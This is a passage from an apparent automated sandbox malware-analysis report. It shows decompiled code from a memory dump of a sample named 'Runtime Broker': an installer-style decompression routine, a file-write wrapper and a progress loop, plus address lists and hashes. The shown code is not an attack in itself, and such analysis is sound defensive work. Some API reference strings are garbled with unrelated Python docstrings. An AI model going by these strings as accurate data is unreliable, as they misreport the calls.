											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406f64
0x00406f64
0x00406f68
0x00406f91
0x00406f9b
0x00406f6a
0x00406f73
0x00406f80
0x00406f83
0x004072c7
0x004072c7
0x004072ca
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x00407316
0x00000000
0x00000000
0x00407318
0x0040731c
0x004074cb
0x004074e1
0x004074e9
0x004074f0
0x004074f2
0x004074f9
0x004074fd
0x004074fd
0x00407328
0x0040732f
0x00407337
0x0040733a
0x0040733d
0x0040733d
0x00407343
0x00407343
0x00406adf
0x00406adf
0x00406adf
0x00406ae8
0x00000000
0x00000000
0x00406aee
0x00000000
0x00406af9
0x00000000
0x00000000
0x00406b02
0x00406b05
0x00406b08
0x00406b0c
0x00000000
0x00000000
0x00406b12
0x00406b15
0x00406b17
0x00406b18
0x00406b1b
0x00406b1d
0x00406b1e
0x00406b20
0x00406b23
0x00406b28
0x00406b2d
0x00406b36
0x00406b49
0x00406b4c
0x00406b58
0x00406b80
0x00406b82
0x00406b90
0x00406b90
0x00406b94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b84
0x00406b84
0x00406b87
0x00406b88
0x00406b88
0x00000000
0x00406b84
0x00406b5e
0x00406b63
0x00406b63
0x00406b6c
0x00406b74
0x00406b77
0x00000000
0x00406b7d
0x00406b7d
0x00000000
0x00406b7d
0x00000000
0x00406b9a
0x00406b9a
0x00406b9e
0x0040744a
0x00000000
0x0040744a
0x00406ba7
0x00406bb7
0x00406bba
0x00406bbd
0x00406bbd
0x00406bbd
0x00406bc0
0x00406bc4
0x00000000
0x00000000
0x00406bc6
0x00406bcc
0x00406bf6
0x00406bfc
0x00406c03
0x00000000
0x00406c03
0x00406bd2
0x00406bd5
0x00406bda
0x00406bda
0x00406be5
0x00406bed
0x00406bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c35
0x00406c3b
0x00406c3e
0x00406c4b
0x00406c53
0x004072c7
0x00000000
0x00000000
0x00406c0a
0x00406c0a
0x00406c0e
0x00407459
0x00000000
0x00407459
0x00406c1a
0x00406c25
0x00406c25
0x00406c25
0x00406c28
0x00406c2b
0x00406c2e
0x00406c33
0x00000000
0x00000000
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x00407316
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c5b
0x00406c5d
0x00406c60
0x00406cd1
0x00406cd4
0x00406cd7
0x00406cde
0x00406ce8
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x004072c7
0x00406c62
0x00406c66
0x00406c69
0x00406c6b
0x00406c6e
0x00406c71
0x00406c73
0x00406c76
0x00406c78
0x00406c7d
0x00406c80
0x00406c83
0x00406c87
0x00406c8e
0x00406c91
0x00406c98
0x00406c9c
0x00406ca4
0x00406ca4
0x00406ca4
0x00406c9e
0x00406c9e
0x00406c9e
0x00406c93
0x00406c93
0x00406c93
0x00406ca8
0x00406cab
0x00406cc9
0x00406ccb
0x00000000
0x00406cad
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb8
0x00406cb8
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc0
0x00406cc1
0x00406cc4
0x00000000
0x00406cc4
0x00000000
0x00406efa
0x00406efe
0x00406f1c
0x00406f1f
0x00406f26
0x00406f29
0x00406f2c
0x00406f2f
0x00406f32
0x00406f35
0x00406f37
0x00406f3e
0x00406f3f
0x00406f41
0x00406f44
0x00406f47
0x00406f4a
0x00406f4a
0x00406f4f
0x00000000
0x00406f4f
0x00406f00
0x00406f03
0x00406f06
0x00406f10
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x00000000
0x00000000
0x00000000
0x00406fa7
0x00406fab
0x00000000
0x00000000
0x00406fb1
0x00406fb5
0x00000000
0x00000000
0x00406fbb
0x00406fbd
0x00406fc1
0x00406fc1
0x00406fc4
0x00406fc8
0x00000000
0x00000000
0x00407018
0x0040701c
0x00407023
0x00407026
0x00407029
0x00407033
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x004072c7
0x0040701e
0x00000000
0x00000000
0x0040703f
0x00407043
0x0040704a
0x0040704d
0x00407050
0x00407045
0x00407045
0x00407045
0x00407053
0x00407056
0x00407059
0x00407059
0x0040705c
0x0040705f
0x00407062
0x00407062
0x00407065
0x0040706c
0x00407071
0x00000000
0x00000000
0x004070ff
0x004070ff
0x00407103
0x004074a1
0x00000000
0x004074a1
0x00407109
0x0040710c
0x0040710f
0x00407113
0x00407116
0x0040711c
0x0040711e
0x0040711e
0x0040711e
0x00407121
0x00407124
0x00000000
0x00000000
0x00406cf4
0x00406cf4
0x00406cf8
0x00407465
0x00000000
0x00407465
0x00406cfe
0x00406d01
0x00406d04
0x00406d08
0x00406d0b
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d19
0x00406d1c
0x00406d1f
0x00000000
0x00000000
0x00406d25
0x00406d2b
0x00000000
0x00000000
0x00406d31
0x00406d31
0x00406d35
0x00406d38
0x00406d3b
0x00406d3e
0x00406d41
0x00406d42
0x00406d45
0x00406d47
0x00406d4d
0x00406d50
0x00406d53
0x00406d56
0x00406d59
0x00406d5c
0x00406d5f
0x00406d7b
0x00406d7e
0x00406d81
0x00406d84
0x00406d8b
0x00406d8f
0x00406d91
0x00406d95
0x00406d61
0x00406d61
0x00406d65
0x00406d6d
0x00406d72
0x00406d74
0x00406d76
0x00406d76
0x00406d98
0x00406d9f
0x00406da2
0x00000000
0x00406da8
0x00000000
0x00406da8
0x00000000
0x00406dad
0x00406dad
0x00406db1
0x00407471
0x00000000
0x00407471
0x00406db7
0x00406dba
0x00406dbd
0x00406dc1
0x00406dc4
0x00406dca
0x00406dcc
0x00406dcc
0x00406dcc
0x00406dcf
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd8
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406de0
0x00406de3
0x00406de6
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df5
0x00406df8
0x00406e10
0x00406e13
0x00406e16
0x00406e19
0x00406e19
0x00406e1c
0x00406e20
0x00406e22
0x00406dfa
0x00406dfa
0x00406e02
0x00406e07
0x00406e09
0x00406e0b
0x00406e0b
0x00406e25
0x00406e2c
0x00406e2f
0x00000000
0x00406e31
0x00000000
0x00406e31
0x00406e2f
0x00406e36
0x00406e36
0x00406e36
0x00406e36
0x00000000
0x00000000
0x00406e71
0x00406e71
0x00406e75
0x0040747d
0x00000000
0x0040747d
0x00406e7b
0x00406e7e
0x00406e81
0x00406e85
0x00406e88
0x00406e8e
0x00406e90
0x00406e90
0x00406e90
0x00406e93
0x00406e96
0x00406e96
0x00406e9c
0x00406e3a
0x00406e3a
0x00406e3d
0x00000000
0x00406e3d
0x00406e9e
0x00406e9e
0x00406ea1
0x00406ea4
0x00406ea7
0x00406eaa
0x00406ead
0x00406eb0
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ed4
0x00406ed7
0x00406eda
0x00406edd
0x00406edd
0x00406ee0
0x00406ee4
0x00406ee6
0x00406ebe
0x00406ebe
0x00406ec6
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ee9
0x00406ef0
0x00406ef3
0x00000000
0x00406ef5
0x00000000
0x00406ef5
0x00000000
0x00407182
0x00407182
0x00407186
0x004074ad
0x00000000
0x004074ad
0x0040718c
0x0040718f
0x00407192
0x00407196
0x00407199
0x0040719f
0x004071a1
0x004071a1
0x004071a1
0x004071a4
0x00000000
0x00000000
0x00406f52
0x00406f52
0x00406f55
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x00000000
0x00407291
0x00407295
0x004072b7
0x004072ba
0x004072c4
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x004072c7
0x00407297
0x0040729a
0x0040729e
0x004072a1
0x004072a1
0x004072a4
0x00000000
0x00000000
0x0040734e
0x00407352
0x00407370
0x00407370
0x00407370
0x00407377
0x0040737e
0x00407385
0x00407385
0x00000000
0x00407385
0x00407354
0x00407357
0x0040735a
0x0040735d
0x00407364
0x004072a8
0x004072a8
0x004072ab
0x00000000
0x00000000
0x0040743f
0x00407442
0x00407343
0x00000000
0x00000000
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00407090
0x00407093
0x00407096
0x00407098
0x0040709a
0x0040709a
0x0040709b
0x0040709e
0x004070a5
0x004070a8
0x004070b6
0x00000000
0x00000000
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739f
0x004074d7
0x00000000
0x004074d7
0x004073a5
0x004073a8
0x004073ab
0x004073af
0x004073b2
0x004073b8
0x004073ba
0x004073ba
0x004073ba
0x004073bd
0x004073c0
0x004073c0
0x004073c0
0x004073c0
0x004073c3
0x004073c3
0x004073c7
0x00407427
0x0040742a
0x0040742f
0x00407430
0x00407432
0x00407434
0x00407437
0x00407343
0x00407343
0x00000000
0x00407349
0x00407343
0x004073c9
0x004073cf
0x004073d2
0x004073d5
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073e7
0x004073ea
0x00407403
0x00407406
0x00407409
0x0040740c
0x00407410
0x00407412
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073f4
0x004073f9
0x004073fb
0x004073fe
0x004073fe
0x00407419
0x00407420
0x00000000
0x00407422
0x00000000
0x00407422
0x00000000
0x004070be
0x004070c1
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00406e40
0x00406e40
0x00406e44
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00000000
0x00000000
0x00406fcb
0x00406fcb
0x00406fcf
0x00407495
0x00000000
0x00407495
0x00406fd5
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407001
0x00407004
0x00407006
0x00407006
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x00407009
0x00407009
0x00000000
0x00407009
0x0040728a
0x004074bf
0x00000000
0x00000000
0x00406aee
0x004074f6
0x004074f6
0x00000000
0x004074f6
0x00407343
0x004072ca
0x004072c7

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004060E4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060E4(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e8
0x004060f8
0x00406100
0x00000000
0x00406107
0x00000000
0x00406109

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00413643, use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi,00403511, use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi,00413643,# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""",00004000,?,00000000,0040333B,00000004), ref: 004060F8

Strings

use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi, xrefs: 004060E4

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: FileWrite
String ID: use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi
API String ID: 3934441357-1078002776
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a2b0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

